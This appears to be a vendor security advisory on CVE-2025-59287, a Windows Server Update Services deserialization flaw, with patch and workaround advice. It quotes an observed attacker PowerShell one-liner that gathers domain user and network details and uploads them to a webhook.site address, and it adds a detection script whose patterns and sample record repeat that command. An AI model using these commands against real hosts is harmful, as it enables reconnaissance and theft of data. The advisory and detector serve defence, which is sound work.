Microsoft Releases Emergency Patch for Exploited Critical Remote Code Execution Vulnerability (CVE-2025-59287)

On October 23, 2025, Microsoft took decisive action by releasing an out-of-band security update addressing a critical vulnerability identified as CVE-2025-59287. This flaw, which arises from the deserialization of untrusted data within Windows Server Update Services (WSUS), poses a significant risk as it allows remote, unauthenticated attackers to execute arbitrary code by sending a specially crafted event. Notably, only Windows servers with the WSUS Server Role enabled are susceptible to this vulnerability, a feature that is not activated by default.

Although CVE-2025-59287 was initially addressed in the October Patch Tuesday update, Microsoft has acknowledged that the original patch was insufficient. The latest update is essential for fully mitigating the vulnerability. Following the release of this patch, threat actors have begun exploiting the vulnerability, leading to its inclusion in CISA’s Known Exploited Vulnerabilities Catalog. Furthermore, technical details and proof-of-concept exploits for CVE-2025-59287 have become publicly available.

Threat Activity Targeting WSUS Servers

Arctic Wolf has been monitoring a threat campaign specifically targeting WSUS servers through ports 8530 and 8531. While it remains unclear if this campaign is directly linked to CVE-2025-59287, the nature of the incidents is concerning. In these incidents, a malicious PowerShell script is executed within a cmd process spawned by either the IIS worker process (w3wp.exe) or wsusservice.exe. The injected command runs reconnaissance such as net user /domain and ipconfig /all and sends the output to an attacker-controlled domain.

try{$r= (&{echo https://REDACTEDIP:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$.ToString()} ;$w="http://webhook[.]site/REDACTED";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl[.]exe -k $w --data-binary $r}
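One way to turn the observed pattern into detection logic, as an added example that is not Arctic Wolf's or Microsoft's code: it flags cmd.exe or PowerShell spawned by w3wp.exe or wsusservice.exe, and raises the severity when the command line also carries the net user /domain, ipconfig /all and webhook upload seen above. The Sysmon-style records are constructed for the example and the webhook ID is a placeholder.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# Process-creation records (Sysmon Event ID 1) reduced to the three fields the
# check needs. Field names follow Sysmon's schema; the records themselves are
# constructed for this example and every path and URL in them is made up.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -c "try{$r=(&{net user /domain; ipconfig /all}|out-string)}catch{};'
                    r'iwr -UseBasicParsing -Uri http://webhook.site/EXAMPLE-ID -Body $r -Method Put"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",        # not a WSUS parent
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},   # no recon or exfil
]

WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}       # IIS worker process / WSUS service
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON_PATTERNS = [re.compile(p, re.I) for p in (
    r"\bnet(?:\.exe|1)?\s+user\b.*/domain\b",        # net user /domain
    r"\bipconfig(?:\.exe)?\s+/all\b",                # ipconfig /all
)]
EXFIL_PATTERNS = [re.compile(p, re.I) for p in (
    r"\b(?:iwr|invoke-webrequest|curl(?:\.exe)?)\b",  # HTTP client used to ship the output
    r"webhook\.site",
)]

def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()

def classify(event: dict) -> Optional[str]:
    """'high' = WSUS parent + shell + recon + exfil; 'medium' = WSUS parent + shell only."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in WSUS_PARENTS or child not in SHELLS:
        return None
    cmd = event.get("CommandLine", "")
    recon = any(p.search(cmd) for p in RECON_PATTERNS)
    exfil = any(p.search(cmd) for p in EXFIL_PATTERNS)
    return "high" if recon and exfil else "medium"

def scan(events: list) -> list:
    """Return (index, severity) for every record that should raise an alert."""
    return [(i, sev) for i, e in enumerate(events) if (sev := classify(e))]

if __name__ == "__main__":
    for idx, severity in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {severity} - {SAMPLE_EVENTS[idx]['CommandLine'][:60]}")
```

A shell spawned by the WSUS service or IIS worker is rare enough on a WSUS host that the medium tier is worth reviewing even without the recon and upload markers.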

Arctic Wolf has established Managed Detection and Response coverage for the activities identified in this campaign and will continue to alert customers about new developments as they arise.

After assessing its own environment for potential impacts from this vulnerability, Arctic Wolf has determined that it is not affected.

Recommendations

Upgrade to Latest Fixed Versions

Arctic Wolf strongly advises customers to upgrade to the latest fixed versions of Windows Server to effectively mitigate CVE-2025-59287, as recommended by Microsoft.

Install Arctic Wolf Agent & Sysmon

The installation of the Arctic Wolf Agent and Sysmon is crucial for providing visibility into events necessary to identify activities related to this campaign.

  • For detailed instructions on installing the Arctic Wolf Agent, please refer to the installation guides provided below.
  • If a supported EDR solution is already deployed in your environment, ensure it is configured for monitoring with Arctic Wolf.

Note: Arctic Wolf recommends adhering to change management best practices when deploying the Agent and Sysmon, including testing changes in a controlled environment prior to production deployment.

Workaround (Optional)

For users unable to apply the October 23, 2025, out-of-band update immediately, Microsoft has outlined several mitigations to consider until the update can be implemented:

  • Since only Windows servers with the WSUS Server Role enabled are vulnerable to CVE-2025-59287, disabling WSUS will effectively mitigate the risk. However, be aware that clients will not receive updates from the server if WSUS is disabled.
  • To render WSUS non-operational, block inbound traffic to ports 8530 and 8531 on the host firewall, rather than solely at the network or perimeter firewall.
